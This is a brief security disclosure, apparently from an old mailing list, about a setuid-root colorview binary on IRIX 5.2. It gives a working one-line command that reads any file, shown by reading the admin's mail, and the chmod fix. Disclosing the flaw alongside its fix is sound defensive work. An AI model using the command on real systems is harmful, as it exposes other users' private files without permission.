|
A vulnerability exists under IRIX 5.2 (std release) that allows any user to read any file on the system. % uname -a IRIX bailer 5.2 02282016 IP22 mips % ls -als /usr/sbin/colorview 742 -rwsr-xr-x 1 root sys 379680 Jun 7 10:36 /usr/sbin/colorview An example (to view the admin's mail file): % /usr/sbin/colorview -text /var/spool/mail/admin To correct this: # chmod u-s /usr/sbin/colorview -- /-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ | Blackstar - jmartin@herky.cs.uiowa.edu | | "Beware of the bugs in the above code; I have only proved it | | correct, not tried it." -- Donald Knuth | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/